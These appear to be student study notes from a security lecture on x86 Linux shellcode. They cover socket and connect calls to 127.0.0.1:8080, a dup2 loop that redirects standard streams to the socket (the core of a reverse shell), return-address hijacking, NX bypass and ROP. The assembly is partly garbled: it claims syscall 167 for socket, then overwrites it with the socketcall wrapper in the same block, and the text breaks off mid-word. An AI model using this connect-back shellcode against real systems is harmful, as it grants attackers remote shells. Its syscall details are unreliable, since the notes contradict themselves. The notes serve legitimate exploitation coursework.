cs1650 - Lecture10 - Detailed Study Notes on Shell Coding, System Calls, and Code Reuse Techniques

Overview of Shell Coding and System Calls

Understanding the principles of shell coding, particularly in relation to system calls like socket, connect, and dup2.
Emphasis on minimizing code size, crucial for fitting shellcode into small buffer overflows, and using various clever tricks to manage the execution flow and make the shellcode position-independent.

Introduction to Socket System Call

System call for creating a socket: socket.
Arguments to socket:
- Domain: AF_INET (value $2$ ), for IPv4 internet protocols.
- Type: SOCK_STREAM (value $1$ ), for connection-oriented TCP sockets.
- Protocol: $0$ (default protocol, usually TCP for SOCK_STREAM).
How to determine constants: consult header files (e.g., <sys/socket.h>), read man pages (e.g., man 2 socket), or write small C programs to print their values.

Implementation Steps for Socket Creation

Store the socket system call number ( $167$ on Linux x86) in the EAX register.
Set arguments in EBX, ECX, EDX registers:
- $2$ (for AF_INET) into EBX.
- $1$ (for SOCK_STREAM) into ECX.
- $0$ (for default protocol) into EDX.

Invoke the int 80 instruction to execute the system call. The new socket's file descriptor is returned in EAX.

; conceptual assembly for socket(AF_INET, SOCK_STREAM, 0)
mov    eax, 0xa7   ; syscall number 167 (0xa7 in hex) for socketcall
; The actual socket syscall on x86 is often wrapped by 'socketcall'
; For direct socket, it might depend on kernel version. Let's use 167 as specified.
mov    ebx, 0x2    ; AF_INET
mov    ecx, 0x1    ; SOCK_STREAM
mov    edx, 0x0    ; Protocol 0
int    0x80
; EAX now holds the socket file descriptor

Efficiency in Shell Code

Different encoding techniques can minimize byte size for instructions, which is critical for shellcode.
Using push and pop instructions effectively to transfer values to registers, often saving bytes compared to mov instructions.
Example of encoding efficiency:
- To place the value $67$ into EAX using MOV, it would be mov eax, 0x43 (5 bytes: B8 43 00 00 00).
- Using push with an 8-bit immediate: push 0x43 would encode as 6A 43 (2 bytes), then followed by pop eax (1 byte: 58), totaling 3 bytes. This is more efficient for small immediate values.

Sequence of Instructions

Using various instructions to manipulate register values and the stack:
- MOV to place immediate values or register contents into other registers or memory.
- POP to retrieve values from the top of the stack into registers.
- INC (increment) and DEC (decrement) to alter register values conveniently in smaller instructions, often used for values like $0, 1, 2$ or small offsets.

Data Structure for Connection via `connect`

Details on the sockaddr_in data structure passed to the connect call, which defines the target address:
1. sin_family: Field for address family (2 bytes, AF_INET, value $2$ ).
2. sin_port: Field for port (2 bytes, e.g., $8080$ ). This must be in network byte order.
3. sin_addr: Field for IP address (4 bytes, e.g., 127.0.0.1). This also must be in network byte order.
Layout of the sockaddr_in structure in memory (conceptual):
+-------------------+ <-- Address of structure (e.g., ESP) | AF_INET (0x0002) | 2 bytes, network byte order +-------------------+ | Port (e.g., 0x1F90) | 2 bytes, network byte order (8080 = 0x1F90) +-------------------+ | IP (e.g., 0x0100007F) | 4 bytes, network byte order (127.0.0.1 = 0x7F000001 reversed) +-------------------+ | Padding (0x00000000, 8 bytes) | +-------------------+ <-- Size is typically 16 bytes for sockaddr_in

Connection Sequence

Execute the connect system call after the socket creation, which yields a file descriptor.
Use the socket file descriptor (returned by socket) as the first argument for connect (in EBX).
Prepare the sockaddr_in structure on the stack with the target IP and port.
The second argument (in ECX) will be a pointer to this sockaddr_in structure (e.g., ESP).
The third argument (in EDX) will be the size of the structure (e.g., $16$ bytes for sockaddr_in).

Use int 80 to make the connect call and check for errors or success based on the EAX return value (typically $0$ for success, $-1$ for error).

; conceptual assembly for connect(sockfd, &sockaddr_in_ptr, sizeof(sockaddr_in))
; EAX = sockfd (from previous socket call)
push   0x0100007f    ; IP 127.0.0.1 (network byte order)
push   word 0x901f   ; Port 8080 (network byte order: 0x1f90)
push   word 0x2      ; AF_INET (0x0002)
mov    ecx, esp      ; pointer to sockaddr_in structure on stack
mov    edx, 0x10     ; size of sockaddr_in (16 bytes)
mov    eax, 0xa7     ; syscall number 167 for socketcall
mov    ebx, sock_fd_value ; The file descriptor from socket call
; Sub-call for connect needs to be handled via socketcall. Syscall arg for connect is 0x3
; This implies structure for socketcall
; For clarity, assuming direct connect syscall for demonstration purpose, if not using socketcall wrapper
; If using socketcall: eax=102, ebx=SYS_CONNECT (3), ecx=ptr to args (sockfd, ptr_to_sockaddr, len)
mov    eax, 0x66     ; Syscall number 102 (0x66) for socketcall
mov    ebx, 0x3      ; SYS_CONNECT constant for socketcall wrapper
push   edx           ; Push len (0x10)
push   ecx           ; Push ptr_to_sockaddr
push   sock_fd_value ; Push socket_fd
mov    ecx, esp      ; ECX points to the arguments array for socketcall
int    0x80
; EAX now holds return value (0 for success)

Duplication of File Descriptors

Use dup2 system call to duplicate file descriptors for standard input ( $0$ ), standard output ( $1$ ), and standard error ( $2$ ), redirecting them to the established socket.
The dup2 syscall number on Linux x86 is $63$ (or 0x3F).

Sequence of operations for duplicating the socket file descriptor (oldfd) to stdin, stdout, stderr (newfd):

The dup2 syscall requires:
- EAX must hold $0x3F$ (decimal $63$ ).
- EBX must hold the oldfd (the socket file descriptor).
- ECX must hold the newfd (which will be $2$ , then $1$ , then $0$ ).

; conceptual assembly for dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
mov    ebx, sock_fd_value ; Load socket fd into EBX (oldfd)
mov    ecx, 0x2       ; Start with newfd = 2 (stderr)
loop_dup:
    mov    eax, 0x3f   ; Syscall number 63 (0x3F) for dup2
    int    0x80
    dec    ecx         ; Decrement newfd (2 -> 1 -> 0)
    jns    loop_dup    ; Loop while ECX is not negative (i.e., for 2, 1, 0)

Handling Control Flow Hijacking

The process of hijacking the control flow, typically via overwriting return addresses on the stack during a buffer overflow.
This allows an attacker to steer program execution from its legitimate path to arbitrary shellcode injected into memory.
When a function returns, the EIP (instruction pointer) is loaded with the address stored at the top of the stack. By overwriting this address with the entry point of injected shellcode, control is transferred.

Non-Executable Memory and Code Reuse

Introduction of non-executable pages (e.g., Data Execution Prevention, NX bit) as a defense mechanism to prevent execution of code from data segments (like the stack or heap).
Explanation of the mProtect system call for altering memory permissions (e.g., PROT_EXEC to make a page executable). mProtect arguments include: addr (start address), len (length of region), and prot (protection flags like PROT_READ | PROT_WRITE | PROT_EXEC).

Code Injection Techniques

Discussion on bypassing non-execution protections without directly injecting new executable assembly code.
How to leverage existing code already present in memory (e.g., within shared libraries like libc) rather than injecting new assembly code directly.
This method, known as Return-Oriented Programming (ROP), involves chaining small sequences of existing instructions (called "gadgets") that end in a ret instruction. By carefully controlling the stack, these gadgets can be executed in sequence to perform arbitrary operations, effectively creating new logic from existing code.

Structuring Shell Code for Execution

Crafting shell code (or ROP chains) in such a way that it can resume control to already present functions after executing its payload or perform complex operations using chained gadgets.
Building diagrammatic representations of where stack pointers (ESP) point during controlled execution, showing how return addresses are manipulated to call gadgets and manage function arguments on the stack.

Conclusion and Future Directions

Continued exploration of the nuances in bypassing memory protections through direct control of memory and exploitation techniques.
High-